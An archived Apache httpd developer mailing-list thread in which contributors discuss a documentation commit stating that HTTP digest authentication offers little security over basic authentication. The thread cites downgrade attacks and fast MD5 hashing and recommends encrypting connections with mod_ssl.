You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@httpd.apache.org by Stefan Fritsch <sf...@sfritsch.de> on 2013/12/30 17:58:45 UTC
digest auth is not really more secure than basic auth (Fwd: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml)
Does anyone disagree with the below change (not yet merged to 2.x
branches)? There is a similar paragraph in howto/auth.xml that I
intend to remove.
----------
Author: sf
Date: Mon Dec 30 16:49:31 2013
New Revision: 1554276
URL: http://svn.apache.org/r1554276
Log:
digest auth is only marginally more secure than basic auth.
Adjust the docs to today's reality.
Modified:
httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
Modified: httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
URL:
http://svn.apache.org/viewvc/httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml?rev=1554276&r1=1554275&r2=1554276&view=diff
==============================================================================
--- httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml (original)
+++ httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml Mon Dec 30
16:49:31 2013
@@ -32,7 +32,11 @@
<summary>
<p>This module implements HTTP Digest Authentication
(<a href="http://www.faqs.org/rfcs/rfc2617.html">RFC2617</a>),
and
- provides a more secure alternative to
<module>mod_auth_basic</module>.</p>
+ provides an alternative to <module>mod_auth_basic</module> where
the
+ password is not transmitted as cleartext. However, the security
+ improvement over basic authentication is very small. Encrypting
the
+ whole connection using <module>mod_ssl</module> is a much better
+ alternative.</p>
</summary>
<seealso><directive
module="mod_authn_core">AuthName</directive></seealso>
@@ -70,9 +74,14 @@
</example>
<note><title>Note</title>
- <p>Digest authentication is more secure than Basic
authentication,
- but only works with supporting browsers. As of this writing
(December
- 2012) all major browsers support digest authentication.</p>
+ <p>Digest authentication was intended to be more secure than
basic
+ authentication, but no longer fulfills that design goal. A
+ man-in-the-middle attacker can trivially force the browser to
downgrade
+ to basic authentication. And even a passive eavesdropper can
brute-force
+ the password using today's graphics hardware, because the hashing
+ algorithm used by digest authentication is too fast. Therefore
+ using <module>mod_ssl</module> to encrypt the whole connection is
+ recommended.</p>
<p><module>mod_auth_digest</module> only works properly on
platforms
where APR supports shared memory.</p>
</note>
Re: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
Posted by Stefan Fritsch <sf...@sfritsch.de>.
Am Montag, 30. Dezember 2013, 18:11:56 schrieb Reindl Harald:
> Am 30.12.2013 18:07, schrieb Graham Leggett:
> > On 30 Dec 2013, at 6:58 PM, Stefan Fritsch <sf...@sfritsch.de> wrote:
> >> Does anyone disagree with the below change (not yet merged to 2.x
> >> branches)? There is a similar paragraph in howto/auth.xml that I
> >> intend to remove.
> >
> > I would say digest authentication is insecure because it (to my
> > knowledge) forces you to store the password in cleartext
>
> clearly no
>
> [harry@srv-rhsoft:~]$ htdigest --help
> Usage: htdigest [-c] passwordfile realm username
> The -c flag creates a new file.
>
> does *not* store plaintext passwords
True, but as with the hash transmitted over the wire, the hash used in
the digest file is just a single round of md5 which can easily be
brute forced. Also, if the hashed string in the htdigest file is
known, one can use it for digest authentication without knowing the
real password.
The insecure password storage is definitely another reason not to use
digest auth. I will add that to the docs, too.
Re: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
Posted by Reindl Harald <h....@thelounge.net>.
Am 30.12.2013 18:07, schrieb Graham Leggett:
> On 30 Dec 2013, at 6:58 PM, Stefan Fritsch <sf...@sfritsch.de> wrote:
>
>> Does anyone disagree with the below change (not yet merged to 2.x
>> branches)? There is a similar paragraph in howto/auth.xml that I
>> intend to remove.
>
> I would say digest authentication is insecure because it (to my knowledge)
> forces you to store the password in cleartext
clearly no
[harry@srv-rhsoft:~]$ htdigest --help
Usage: htdigest [-c] passwordfile realm username
The -c flag creates a new file.
does *not* store plaintext passwords
Re: digest auth is not really more secure than basic auth (Fwd: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml)
Posted by Graham Leggett <mi...@sharp.fm>.
On 30 Dec 2013, at 6:58 PM, Stefan Fritsch <sf...@sfritsch.de> wrote:
> Does anyone disagree with the below change (not yet merged to 2.x
> branches)? There is a similar paragraph in howto/auth.xml that I
> intend to remove.
I would say digest authentication is insecure because it (to my knowledge) forces you to store the password in cleartext. Encrypt the password at rest, encrypt over the wire with basic_auth+ssl.
Regards,
Graham
--